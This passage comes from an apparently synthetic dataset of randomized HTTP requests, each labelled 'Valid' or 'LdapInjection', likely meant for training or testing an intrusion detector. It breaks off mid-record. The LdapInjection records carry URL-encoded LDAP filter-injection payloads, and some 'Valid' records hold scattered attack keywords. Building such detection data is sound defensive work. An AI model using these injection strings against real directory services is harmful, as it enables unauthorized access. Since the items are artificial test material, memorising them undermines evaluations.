UA-Disp: 295,212,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 161x6409
Via: FTP/1.9 www.tkhaf2.png, 3.6 56.27.143.245, HTTP/8.9 188.33.43.96
Transfer-Encoding: identity
Upgrade: aws/0.6
Warning: 321 www.hrctezid.js "o2Tbr6utate" 
X-Forwarded-For: 16.29.207.187
X-Serial-Number: 342559338014903
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

kktandLu1HI@O7=75&T1rxL3M6o1=dHEGVJkQ&iacpoS2eguroe=rn&ilG=0&tc=5

End - Id: 5519
Start - Id: 38943
class: LdapInjection
GET /aan.jsp?1.var8tS=Ag%29%28%26%28objectClass++++%3D+++au*%29&ets6pienoatod=17514110 HTTP/1.1
Host: 230.41.149.92
Connection: odate7ph
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 207.127.83.104
Cookie: te=h_Et4Q5bLt3;sfet=ohps7r/eexec;bhsne=49303
Cookie2: $Version="7"
Date: Sun, 12 Feb 06 17:48:23 GMT
ETag: W/"ZzhSlCITX6NTS9bN"
Expect: LdFns
From: merdf@ssdhtag.cz
If-Modified-Since: Fri, 30 Dec 05 20:28:42 UTC
If-Unmodified-Since: Fri, 23 Dec 05 24:48:45 GMT
If-Match: *
If-None-Match: "8b4EsaMoXn.iLGv"
If-Range: Tue, 20 Jan 04 04:59:28 CET
Max-Forwards: 7
MIME-Version: 4.0
Pragma: 1ymeE3bt=bngaA
Proxy-Authorization: NTLM NGloNUVlOER0YWFvb2dlMHRBZnZuR3RlczZodDJkaWVoc0Ruc2I=
Authorization: Basic dG9lcEZxOndjYjR3UlJh
Range: 19115-,-68,486-99
Referer: /nnsfbehe.fgf
TE: chunked,chunked
Trailer: From
User-Agent: Mozilla/6.2 (Windows; U; Win 9x 2.2; ye-rn; rv:8.6.2) Gecko/58098626
UA-CPU: 68000
UA-Disp: 8172,5109,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 0621x5666
Via: 0.8 89.150.107.5:36670
Transfer-Encoding: treihe; ttti0=ddIrm
Upgrade: shejr/6.7, moOdhj/9.9, yir/7.8
Warning: 059 110.126.4.121 "ei72xe" 
X-Forwarded-For: 97.3.123.50
X-Serial-Number: 498357729
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38943
Start - Id: 26424
class: Valid
GET /oCiyFQe8OAGZGm6/lgun.html?et7io=gdgc&rismmtnieaa5ia=95054&ddthd5mitpat=pm%3Fniaabin%3D HTTP/1.0
Host: www.bsmglrEi.com
Connection: keep-alive
Accept: image/*
Accept-Charset: windows-1254;q=0.4
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 171.249.208.3
Cookie: p43njeev=487;ja=r4<sqd'a;necli2tt=92472
Cookie2: $Version="6"
Date: Sun, 16 Mar 08 21:09:02 CET
ETag: "fK1XDGMWJ.QIP@.ZL.v"
Expect: 100-continue
From: 0vaorneD@ken7hhpNbe.st
If-Modified-Since: Sat, 05 Jul 08 08:41:05 CET
If-Unmodified-Since: Sat, 19 Nov 05 22:01:30 UTC
If-Match: "8gpVCWIuL33UeWk0c8Qn"
If-None-Match: *
If-Range: Sat, 01 Aug 09 23:45:20 GMT
Max-Forwards: 11
MIME-Version: 3.5
Pragma: oyndzti=t
Proxy-Authorization: uusSe za0dery=1Aaig
Authorization: Digest cnonce="ln1nihtw"
Range: 976674-,-469,33-19
Referer: http://Pnzhcaa.de/EqlHxte/erebrm5i.txt
TE: trailers,trailers
Trailer: From
User-Agent: Mozilla/1.8 (compatible; Konqueror/8.0; Solaris; hedlyp)
UA-CPU: StrongARM
UA-Disp: 0058,1440,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 0638x9966
Via: 5.6 www.1ibd5um.gif:47
Transfer-Encoding: compress
Upgrade: lwmdc/2.7, Het/5.1
Warning: 710 www.ehhtaa.js "saamq" "Sun, 18 May 08 10:22:40 CET"
X-Forwarded-For: 59.157.184.124
X-Serial-Number: 3166594195
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26424
Start - Id: 22956
class: Valid
GET /lwGOrWaxu/R4K/iwiabaokeaw.js?rtt1AEhvFie=il-4&wkn1Ve=vnaPls7bnGo HTTP/1.1
Host: www.humghmroht.de
Connection: oeicti
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: deflate;q=0.5, deflate
Accept-Language: ftcptw-lomsa;q=0.0, or-u0M, a-reefogt
Cache-Control: no-transform
Client-ip: 140.119.82.68
Cookie: t6gonbhNj=eBP-Jum
Cookie2: $Version="2"
Date: Thu, 24 Jan 08 13:35:14 GMT
ETag: "ccKk8LrcO2k1cAc2Rtw"
Expect: otsud
From: ebcNord@jpan.biz
If-Modified-Since: Mon, 10 Oct 05 02:46:39 GMT
If-Unmodified-Since: Sun, 09 Oct 05 09:41:39 CET
If-Match: "YLLjMsSZlzHplSwY"
If-None-Match: "k-6Z9Qb1DIXVDuaI7f"
If-Range: Fri, 28 Aug 09 21:17:29 CET
Max-Forwards: 515
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: Basic dHByY2xVOmxmZTFP
Authorization: NTLM c3hkbHlwdHNuaG9tcWllYTVsdGZlaG5odDdubDF0QWRyb2t1RTk=
Range: 31732-,84218-
Referer: http://www.sbrtl.fr/Crhyamtt/rru6/atncey/jbesde.jpeg
TE: trailers,gzip;q=0.6
Trailer: Pragma
User-Agent: ifhasedTou (ebp.6FW; aAylzpO)
UA-CPU: 68000
UA-Disp: 164,400,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 159x1338
Via: aka0ne/4.1 240.204.123.198, FTP/2.9 247.139.111.253, 5.0 www.tlmeuR.jpeg
Transfer-Encoding: identity
Upgrade: rnr2u/8.9, NBtv8d/1.1, cmOm1/0.6
Warning: 438 49.79.91.51:038 "rCeoI3u9lEt" "Sat, 30 Apr 05 03:17:12 GMT"
X-Forwarded-For: 208.109.201.230
X-Serial-Number: 08954851223
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 22956
Start - Id: 38008
class: LdapInjection
GET /JwfO/nnDzo5/nlweb5H.mhCJ7Rc/odbuun/n1pdtDqvYCZGH9wfKiP0/r9bgsoundY4VV.png?nlrb5u0tehniv=umib%29%28%7C+%28alop%3D*%29 HTTP/1.0
Host: www.ifdufeh.fr
Connection: suem4ei
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: no-cache
Client-ip: 41.179.118.200
Cookie: esheeezmo3=5;4SataT=oeh2raensikriolaai
Cookie2: $Version="949"
Date: Wed, 14 Nov 07 08:28:48 UTC
ETag: "FpA_UeDHlRzDYzb"
Expect: 100-continue
From: 8nlhbept@3gle.ch
If-Modified-Since: Thu, 27 Aug 09 22:15:48 CET
If-Unmodified-Since: Tue, 20 Apr 04 09:20:03 CET
If-Match: *
If-None-Match: "yuFYIrDhYCpRPiOVR"
If-Range: Thu, 23 Apr 09 09:52:45 CET
Max-Forwards: 271
MIME-Version: 4.1
Pragma: dsier=iphxe
Proxy-Authorization: Digest cnonce="uskm"
Authorization: cfOdr a96krnhe=aaemler
Range: 17672-41
Referer: /sedtve9L/apwrfRum/troarRe/ee2vreeG.tar.gz
TE: trailers
Trailer: Connection
User-Agent: ja4kpiI
UA-CPU: Sparc
UA-Disp: 8564,925,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 880x8476
Via: sotboi/1.1 www.nRba8ie4.png, 1.8 www.ouxe.gif, FTP/5.6 www.tLiue.shtml
Transfer-Encoding: identity
Upgrade: jrr/4.9, egaar/4.0, 1Zoc/3.1, zjwo/5.8, 95o/6.0
Warning: 461 www.3izrso.tiff "rrcdd92qh0Axrii" 
X-Forwarded-For: 69.225.134.146
X-Serial-Number: 800649
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38008
Start - Id: 1967
class: Valid
GET /ae0Z.mspx?etUartanbT=passthru&opKda=Ei&eegttn=2&iROa2hsi=92&i2hi=31268&uegoooeo=39651722&ns1oaedEb17trn=swnod3giiL&MperlRlsa=9&phe=8&_FbMOFexecSFOM=478 HTTP/1.0
Host: 247.36.68.143:052
Connection: keep-alive
Accept: audio/*
Accept-Charset: *
Accept-Encoding: gzip;q=0.7, compress, gzip
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 13.36.44.80
Cookie: mcbconnectuvoR=ho1Deedh71;de=6SrgCe6CK6vL;le=vbscript-ebrr]anghe/aaf;LKdiy=b;qSnndeWwcml=8341;she0awt8sm4tb=2949342
Cookie2: $Version="75"
Date: Sun, 30 Sep 07 11:15:20 CET
ETag: W/"plLBmnTpaJzgnQ."
Expect: ioriht=n0uemi
From: khsdYrld@oa9tovuJa.st
If-Modified-Since: Tue, 27 Jun 06 06:34:41 CET
If-Unmodified-Since: Sat, 24 Feb 07 08:16:03 GMT
If-Match: *
If-None-Match: *
If-Range: "k76ITeuH3mvh0f2"
Max-Forwards: 6
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: wiohon Esah=2tadyd
Authorization: Basic YWxtdGg5OmVvdG5lSXJl
Range: 907906-,4755-184
Referer: http://EReW.biz/iosnhoeO/v5anTe.exe
TE: trailers,trailers
Trailer: Date
User-Agent: efll (xEg-g9TI2)
UA-CPU: MIPS
UA-Disp: 348,029,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 396x457
Via: 8.9 www.dtaydd.css
Transfer-Encoding: identity
Upgrade: n97mw/5.1, nioi/4.6
Warning: 246 144.242.96.229 "zhitriestohvafi" 
X-Forwarded-For: 218.173.209.61
X-Serial-Number: 73691370157203519
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1967
Start - Id: 4580
class: Valid
POST /Ao9eaebh1b3l/vf/e-jDBzHw2in9/fab7fry6onayEarod/e9nsesiif/lXNQxmlnetcatzh2P0RjkA.htm? HTTP/1.1
Content-Length: 28
Content-Language: ebcW
Content-Encoding: identity
Content-Location: /dse11/sseN.mdb
Content-MD5: djBsbGVibEtoQWNndEUybA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 28 Aug 06 12:00:30 CET
Last-Modified: Sun, 29 Apr 07 18:35:34 CET
Host: www.h6authUto.be
Connection: Afgt
Accept: application/x-tar;q=0.1, application/*
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.4
Accept-Language: tclttpa-v7eal;q=0.9, tslu-d
Cache-Control: max-age=8446
Client-ip: 241.23.128.126
Cookie: td=ah5efteWsieds;drAiaEaw1=e/epHi;e2s=005;tdr8sousrEtDuwq=6
Cookie2: $Version="006"
Date: Mon, 26 Apr 04 09:49:54 CET
ETag: W/"vuwqQYwLICNtYcw6B@4"
Expect: 100-continue
From: a5wn@h3Rit.be
If-Modified-Since: Sat, 09 Oct 04 24:53:39 GMT
If-Unmodified-Since: Sat, 12 Nov 05 01:21:19 CET
If-Match: "Ldan5XskSURV@GJ.e_"
If-None-Match: *
If-Range: *
Max-Forwards: 735
MIME-Version: 6.2
Pragma: dt5nbwt='omat0k'
Proxy-Authorization: NTLM bzhzeWdFb2U4c3R0bm9adWxhemVyRXJpY2V0cHd1a2V0ZGVhaXR2c29vdHNjbndk
Authorization: taps elnih=oajRi
Range: -6763
Referer: http://Lbil7S.gov/Tqpaenl/5jgeeut/oiTib5/ehenzPsE.conf
TE: trailers
Trailer: Host
User-Agent: ss8r5t (hxFbks)
UA-CPU: StrongARM
UA-Disp: 067,349,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 1436x3813
Via: 7.0 86.130.241.196, loeT/9.9 www.isKlcby.png
Transfer-Encoding: ipIaiI
Upgrade: y3ba/9.8
Warning: 649 www.rrcapies.js "hmis1Gnyre5" "Thu, 14 Dec 06 16:50:50 UTC"
X-Forwarded-For: 210.240.131.9
X-Serial-Number: 09527
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

Xb66Wm5i.=cuzk;Y9insewdivo

End - Id: 4580
Start - Id: 9523
class: Valid
GET /nSYU@jsG/dtd2/Eo8fte2loha/4nrUNkX/mT1xth/a2lnie25die5/olBR0Q1jSVjl0YT/s_mekFLJ33I.asp?nddsynaaqutaid=91716837&aen3Tn=ulocation%24ps&eZbnnsSnerEr=wnhe+x9%3C%25oToa%3An&vnSt=161&nna=taTwatmihe0ckhHrt&lkrodoar=68&mgeb=827310&e9oUtqsloirmbhx=53197&tn8a3tnjhoontHn=smi95Y&kHe3v7aIp=92121 HTTP/1.1
Host: www.atnqdlsny.st
Connection: keep-alive
Accept: audio/x-wav, video/*;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: sNo-1o;q=0.5
Cache-Control: max-stale
Client-ip: 95.57.226.135
Cookie: Enmdiayl0e=ede@
Cookie2: $Version="2"
Date: Sat, 05 Aug 06 11:51:30 CET
ETag: "wRi26HRC9bfcc@uOd"
Expect: 100-continue
From: i2nofe@soetse.biz
If-Modified-Since: Sun, 26 Dec 04 04:29:26 CET
If-Unmodified-Since: Sat, 26 Sep 09 17:02:41 CET
If-Match: "82SrJtFxbyZRb8gHJcb"
If-None-Match: "dWaL.Q.bHtkZP0P."
If-Range: "RtIcaAauQYRCPN."
Max-Forwards: 2852
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: UraeR rlDgih=Tobabi
Authorization: noweu 4nrus=drhaeaol
Range: 4-77
Referer: /ersdse/beut0sel/etos/rsee8u/atle0t.js
TE: gzip
Trailer: Range
User-Agent: FOpeeoM1lAssoHamt
UA-CPU: 68000
UA-Disp: 389,574,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 279x7075
Via: 4.4 www.tIs39ei8.jpeg, FTP/7.6 www.rljlgjsr.gif, 9.0 80.12.85.149
Transfer-Encoding: gzip
Upgrade: zZr/7.6, ri9ps3/0.6
Warning: 724 1.186.0.197:4 "pvtse" 
X-Forwarded-For: 140.234.18.98
X-Serial-Number: 2426894
----: -------------
~~~~~: ~~~~~~~~~~

null

End - Id: 9523
Start - Id: 4238
class: Valid
POST /gg7e3UQ4fpahk8NqKv/55pERcrj11_k0PCcPP/hBWYZ.oNfxxDA/rmw/5oeutZiXWdyZ/diNJApi4Oe4K/nIRfk0x2PhL2KDdLroy/nnph.js? HTTP/1.1
Content-Length: 337
Content-Language: hrEhxert,rldi,o
Content-Encoding: identity
Content-Location: http://tIiuoEo.net/atotyany/unccrhe.jpeg
Content-MD5: SWx5bmhuRmZtYm91ZHJpMg==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 20 Feb 04 20:29:39 GMT
Last-Modified: Sat, 24 Oct 09 03:24:35 CET
Host: 242.154.29.57
Connection: keep-alive
Accept: video/quicktime;q=0.0
Accept-Charset: iso-2022-kr
Accept-Encoding: compress;q=0.1
Accept-Language: s-4;q=0.9, 4f-ah, ea-ietub, he06-2ah;q=0.3, t-inss;q=0.8
Cache-Control: only-if-cached
Client-ip: 40.116.200.149
Cookie: aoMheufp9t=Osniwindow.openerzpiac-;_n@wostdinM=rlYe 
Cookie2: $Version="571"
Date: Mon, 18 Feb 08 04:15:39 UTC
ETag: "dAzQsYVf9kp3HLIs52i"
Expect: 100-continue
From: arytbst@rawnwnael.com
If-Modified-Since: Wed, 17 Aug 05 02:03:24 CET
If-Unmodified-Since: Mon, 26 Apr 04 21:59:08 UTC
If-Match: "HJq9SUTgrkINGL30E9Pp"
If-None-Match: "o1Ik51VsFDmozW@2CD"
If-Range: "TW0Ohb.lN2pYCKL3@"
Max-Forwards: 54
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: ini5 andat=olio
Authorization: NTLM b3JyM2RpcnNoYW5pbjRpckxubnVlTjhpbG1sb29lZWVvdGVsaQ==
Range: 936255-,7-,-5
Referer: /cfmssaa/m0mGapol/vloye/a0pnpwuN.tiff
TE: trailers
Trailer: Accept
User-Agent: ze0dfrTIntins
UA-CPU: x86
UA-Disp: 9117,635,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 4623x593
Via: 4.1 41.85.95.96, 4.5 205.132.249.240, FTP/7.2 63.165.214.250:0419
Transfer-Encoding: compress
Upgrade: 5ck/7.3
Warning: 344 www.s3tCkSq.css "tonieta9" "Mon, 02 Feb 09 17:14:30 UTC"
X-Forwarded-For: 240.213.181.129
X-Serial-Number: 3720829433622
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~

0aatpgjen=crei&htdeneaAenbhin=po-Ej&eaulzlmibMr=iYewp&hwi6oisynO=pnashn1fseimta&fyonmm=a2oR672adagg&ZTformiwindow.openppTs6V=elrnf$&pcotSnpMv7sa=a>&PUaanhtaccesko&copy2xp_342TG=Qn&5ges=oisa8ezqthee2&artglut=qts3m&7_45having=h9arAinclude a&-YOEVMjA=neaaisrdrwiYpo&yspiTderolT=eobnsarazs%processing-instructiong&bin9Z4YCq4rSZ=e;t

End - Id: 4238
Start - Id: 32541
class: Valid
GET /3PhtCSvWhY1asGLw/uesmCeltGhior/eg0PYLAS/tlgpgHP/00/kscript56Q@.dll?enoypn5=3268933&bgyu=eetl1tfrl5lp&aauCS=4&iwhHj=381327395&hdq11itltsu=ehn0eftafoenaimrtt&fsrxer=emo4ueoEeahw6shsrt&asee8wueowd=447&dVKNwNveXE6=boot.ini%3B HTTP/1.0
Host: www.afynaAajE.gov
Connection: u4oej
Accept: text/*;q=0.0, video/quicktime
Accept-Charset: windows-1250, x-mac-chinesetrad, x-mac-chinesetrad;q=0.5, iso-8859-7;q=0.4
Accept-Encoding: 
Accept-Language: neeen-nomh, l5m4eeg-2kowtet
Cache-Control: no-cache
Client-ip: 188.137.166.100
Cookie: tw4=oe2;eritol1erT=sIzCzhVk;sthutgshae5ael=74086;oEo=moobmedo2P;ocm=esfahaatem8i
Cookie2: $Version="189"
Date: Sun, 22 Aug 04 19:43:41 UTC
ETag: W/"XbiiKcb1VE61J_3"
Expect: tevdeuie=bblc;re58
From: psnI6s@ndanbeNte.fr
If-Modified-Since: Wed, 27 Apr 05 19:32:42 GMT
If-Unmodified-Since: Fri, 01 Aug 08 16:09:48 UTC
If-Match: *
If-None-Match: *
If-Range: "PM6_w43wZunmBuz7s"
Max-Forwards: 1769
MIME-Version: 2.5
Pragma: 0='i'
Proxy-Authorization: Digest cnonce="ni59"
Authorization: Basic dHllczVvbjQ6c3BQZnRvNmg=
Range: 5263-,787600-0811
Referer: /4sbljtou.jpeg
TE: trailers
Trailer: User-Agent
User-Agent: Mozilla/8.9 (Windows; U; Win98 1.4; si-we; rv:1.7.0) Gecko/75957157
UA-CPU: 68000
UA-Disp: 7495,590,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 5706x229
Via: 6.9 180.10.164.140:28571
Transfer-Encoding: jmpgs; exeh=aa9ea
Upgrade: uzoAE/7.9
Warning: 178 240.96.53.2:843 "niMoco" 
X-Forwarded-For: 6.125.126.191
X-Serial-Number: 9677487741536896610
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 32541
Start - Id: 17865
class: Valid
GET /3QdKwGUYp/iUGT_f05aF6ZxHTc.gif?KGH878iaKAQ=l4+9rer7+&1anEe2AoPhvwg1u=842&tAUf=%3FeH+linsertNilsvt-ns&trb0r=329231&etysx=4452022&awdhad=22184665&ero=dtr&zesheneksenEn2=512&Te4p=95&KTInqtdt=aV%40vp11ZZw5C&Gc=nrdhttp%7Eae9dneroe&oUe=3514&ohbeEleiesat=uZiFe545&e7dEey=rmwcdl&dsrtaeRi=sRaakMGKMPX HTTP/1.0
Host: www.Sfbssehi.gov
Connection: edysq
Accept: */*;q=0.3
Accept-Charset: iso-8859-9, isiri-3342;q=0.8
Accept-Encoding: 
Accept-Language: i-Hnot;q=0.3, NsMTs2t-unsrrwr
Cache-Control: max-age=15
Client-ip: 178.158.130.242
Cookie: ttoizmseailtfjk=nrYeo0xu'edocumenth[V;qte9lJdm=tesarNasuoo;n6ssnwiesetgo8=ligd ayuug
Cookie2: $Version="90"
Date: Thu, 30 Apr 09 09:55:58 CET
ETag: W/"XVzJxT5x0iekwNp05"
Expect: anaiO
From: temygise@hhgs.com
If-Modified-Since: Sat, 06 Jan 07 15:09:18 GMT
If-Unmodified-Since: Sun, 30 Nov 08 06:10:16 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 09 Nov 05 07:45:11 UTC
Max-Forwards: 93
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: NTLM dDhPOGVpZTVwUGNob3R3dG90b2I3YjlScHR1dGF0bWhpbHRvbkdp
Authorization: neoE aaojEw=uahxcs
Range: -321024,-932066,827-
Referer: /aeowz7b/zaeh/t0eOliy/cilesee.mpeg
TE: trailers,trailers,gzip
Trailer: Authorization
User-Agent: 3Cg@ma9cd http://www.eebt.fr
UA-CPU: PowerPC
UA-Disp: 929,7380,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 8176x316
Via: HTTP/1.4 www.gt3rzel.jpeg:0
Transfer-Encoding: gzip
Upgrade: stQa7u/4.6, e3t4e/1.7, los0Y/9.6, le6ear/5.3, irt/9.2
Warning: 759 www.kSU0ou.jpeg "aaeisntpaxn" "Thu, 22 Dec 05 01:03:24 UTC"
X-Forwarded-For: 112.242.155.192
X-Serial-Number: 3494344
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 17865
Start - Id: 20913
class: Valid
GET /cpU/rk1NaN3kE3U/i2Jz7r3AaTU.11ZIO/yhJQidyQq8k4/e5yad/tanHi/dv--jsSXgcbJtK.png?8Lcin=57&ieh2fhleo=oyRvvu&3batezltAotl=896&oecohnD=llcuBsN%3Bo&tdaeat7qnSn=36605&aaoeprr0ytEtc=por%28l&oaae4t5d=8673920533&35wuhhnjtz=isyr05mtcopu&nss30u0i=hdOtin&ooserrcdnolgtte=replacewM%3C&1fpRseRe06PNif=eblh&muathhq=84994917&ao5ed1oroaordl=xdPt&biunsjbdp4ret=a%25r&zumemx2=stlshutdown HTTP/1.1
Host: 179.24.196.184
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: identity
Accept-Language: s2nfhr-g91ftIea;q=0.9
Cache-Control: max-stale
Client-ip: 47.98.27.45
Cookie: llijrPtweu=s1;w8n4tbs=aceoeaalloTouscripteo;ia=3u;wi5abhHsrp=0205821335;eaeAdxe=Uaccept
Cookie2: $Version="9"
Date: Wed, 21 Feb 07 15:50:09 CET
ETag: W/"UCpraVfCtd0pS96L4"
Expect: e3nio=aeanEo;1io5iao=h9l6O
From: thieLh@bEdxsci.biz
If-Modified-Since: Mon, 15 Mar 10 08:43:07 UTC
If-Unmodified-Since: Tue, 20 Nov 07 17:16:01 GMT
If-Match: *
If-None-Match: "48J3DQ08nT5.xjuy"
If-Range: Fri, 04 Aug 06 20:22:58 GMT
Max-Forwards: 3
MIME-Version: 6.8
Pragma: t=e
Proxy-Authorization: 5lee isw1q=euaaW
Authorization: Basic c2NlazpkZ2NvamZ4
Range: -250161,-344,295278-511
Referer: /qrot3n.avi
TE: trailers
Trailer: If-None-Match
User-Agent: Mozilla/4.5 (compatible; hrccsa; WinNT; Apdfa5)
UA-CPU: 68000
UA-Disp: 743,400,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 4129x627
Via: vqt/6.0 www.usgo.shtml
Transfer-Encoding: compress
Upgrade: neaxe/1.5
Warning: 524 www.ihrn.jpeg "0rnvrpiinz" "Wed, 08 Apr 09 02:51:11 UTC"
X-Forwarded-For: 186.72.20.98
X-Serial-Number: 8671982338196
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20913
Start - Id: 29165
class: Valid
GET /mVShJYxFdZ/iYOE0zyDepLN8dqo/rPewantee3am/uuQEcQ/vYBeAqh7dVe/nmloaetoaOno4pH/sZ7shutdown/inrrzszzhdEoQbAp/awiAkGFAKh.html?nt6usr=4&Eloqatnaa=691579&eonAcegdamwiacn=244331953&cIiu=008829&2hnhzP2rg1E2Vae=autn HTTP/1.1
Host: www.ltnZ0it.fr
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1251;q=0.4
Accept-Encoding: 
Accept-Language: Wa-oo, i-4ts;q=0.2, n0-siat, eehiyc-e1e;q=0.4, lnd0khe-iYLts;q=0.9
Cache-Control: no-cache
Client-ip: 30.192.154.143
Cookie: CaJnull.b_Lucd=1499;xcq0r=8;21mnEo=99;fl=rh2rbeGnnHirm
Cookie2: $Version="92"
Date: Thu, 15 Apr 04 14:12:33 UTC
ETag: "85oFuJ87To381j4iLxR"
Expect: zNanLe=feir
From: eiiaeuA@e0hi.it
If-Modified-Since: Sun, 09 Jul 06 06:55:09 GMT
If-Unmodified-Since: Thu, 19 May 05 07:37:53 CET
If-Match: "-i0PklHdINlJvIFRJbcN"
If-None-Match: "B.ujjk6CyIvtKeM7s-"
If-Range: Sat, 15 Aug 09 16:22:05 GMT
Max-Forwards: 5
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: naHfne YOi3lhrg=noes0i0h
Authorization: Basic eWRMeGxlbTp0bWFsZQ==
Range: 21-228505,111-,03195-
Referer: http://www.toohAoea.org/eeojRrkf.mspx
TE: trailers
Trailer: Date
User-Agent: Mozilla/9.1 (Windows; U; WinNT 7.1; au-U4; rv:7.3.2) Gecko/41952733
UA-CPU: PowerPC
UA-Disp: 2553,984,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 0871x656
Via: FTP/4.7 www.iino.shtml, 8.8 www.paaLi.css:311
Transfer-Encoding: compress
Upgrade: gb5py/4.7, flrcta/9.4, Ovmcm7/2.9, aeyt/3.0
Warning: 708 56.218.81.142:38202 "p3Rsenoiem43hyao" "Sat, 16 Jun 07 21:36:47 GMT"
X-Forwarded-For: 244.72.112.222
X-Serial-Number: 59543
----: -------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 29165
Start - Id: 11871
class: Valid
GET /7q-upc2p/e1tran04hci/fnrE4drImfronsieeAmd/o8FjBWLq@.ewIfFBfV/zmOBo6b07bucf/nDM1uHRgFgfv.htm?4ro=Elartne%29C+%3EE&lnisoohaSpu=694386&9aymn=fechoect&RqautoexecjPG9CS=654&jeGYJ=90603&st7nhzods=sz-Ao0j4ixPl&ixgehenz=cJSj.lYRc&aUxhD1Cj68=007288097 HTTP/1.1
Host: 75.196.136.225:80
Connection: 8WeOslhn
Accept: audio/x-wav;q=0.8, audio/*;q=0.8
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 253.123.138.51
Cookie: n9bIk=7015219;kLls3lU=712;mneonwgnaohj=5ekp2y1
Cookie2: $Version="5"
Date: Wed, 27 Jul 05 15:06:28 CET
ETag: "4_aFg12lxK-sYw4.W"
Expect: eo6ITna=f0lro7h;mqmonjt
From: letI@hnH5isut.cz
If-Modified-Since: Thu, 04 Oct 07 14:59:40 UTC
If-Unmodified-Since: Sat, 20 May 06 23:32:35 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 80
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: Basic bmtOZDo0ZTVp
Authorization: Basic aXVoY21vUjpiNHZk
Range: 950478-42230,-79
Referer: http://qoisRt.fr/e2o6lj/d3zna/0nkdygr8.sh
TE: trailers
Trailer: Pragma
User-Agent: heokg/3.4.1.1.5
UA-CPU: x86
UA-Disp: 529,350,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 872x2543
Via: 6.8 110.8.64.253
Transfer-Encoding: c1ea
Upgrade: 6tBb5/8.0, exe/8.3
Warning: 165 174.179.176.135:93465 "taieryl3onnp5cttaanx" "Wed, 31 Dec 08 04:33:55 CET"
X-Forwarded-For: 230.225.78.26
X-Serial-Number: 02595980702101510
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11871
Start - Id: 9589
class: Valid
GET /i7Jrpcb0O6QfFM/ePdc5FzpopKPUV/eiumeosakneGn/PhexeccAKUflservicesSvbscriptAQ/gosr/mWiZ/rTeeesttet9ss8voptmt/1rHj1Pc__t/ntai.gif?ftgpnhteTGdt=9590174&bktew2i=ivqNOv&esc6h6=7&2aLemnpuso=w4yE38MfZl1&uteomnSsehqose=hEo&exdF_nwgetYF8H=86&0itolaqefa=rT7&sE=bNleEnot%3Cm&mloirc9rrrj=9lLzsmzL&ttYctS6iu8c=3936&NTpOtNsuhR=jegzwEnaoqtrta&qOOiframeltmpgs=6&bSand8CrsyU=aiRdh&LNedomhsnhnOh=iTrahPlMKsefwsgr&iwk=5uae%26 HTTP/1.1
Host: 81.185.28.81
Connection: close
Accept: */*;q=0.4
Accept-Charset: iso-8859-4, windows-1252, us-ascii, x-mac-icelandic;q=0.7, windows-1251;q=0.7
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.5
Cache-Control: 3t=hdjl
Client-ip: 123.189.18.103
Cookie: Dl7rayiscolt=2eq]woxsmowhereSoH;tW=pgaa9veccou;xhmerrnaIda=sltz;kdWemWvbscript=oTMlVfH;sTeeCseAnv=7t0i9Ooahmorr
Cookie2: $Version="085"
Date: Thu, 22 Dec 05 23:42:26 GMT
ETag: W/"fGkgUkCH6b5QEv-"
Expect: t0pna=erg0c
From: eSsaDtn@crno.be
If-Modified-Since: Fri, 18 May 07 18:03:46 CET
